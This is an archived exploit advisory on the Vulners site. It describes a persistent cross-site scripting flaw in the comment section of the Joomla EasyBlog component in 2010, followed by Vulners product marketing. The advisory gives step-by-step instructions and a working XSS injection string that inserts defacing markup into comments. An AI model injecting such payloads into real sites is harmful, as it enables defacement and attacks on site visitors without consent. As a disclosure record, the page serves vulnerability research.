Vulners
Lucene search
Joomla! Component EasyBlog - Persistent Cross-Site Scripting
Name : Joomla EasyBlog Persistent XSS Vulnerability
Date : july 12,2010
Critical Level : HIGH
vendor URL :http://stackideas.com/products/easyblog.html
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
Publishing your blog in Joomla!-based website has never been easier with EasyBlog. Comes with built-in social integrations with Twitter, Facebook Share and Google Buzz, you never, ever have to manually notify your followers for your new blog entries.
#######################################################################################################
Xploit: Persistent XSS Vulnerability
This vulnerability exists in the comments section.
1. Goto any post and submit your evil xss script in the comment section :P
Attack Pattern:">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>
DEMO URL : http://<site>/easyblog/entry/uncategorized/2010/07/09/testing-umlaut-charaters.htmlData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2010 00:00Current
7High risk
Vulners AI Score7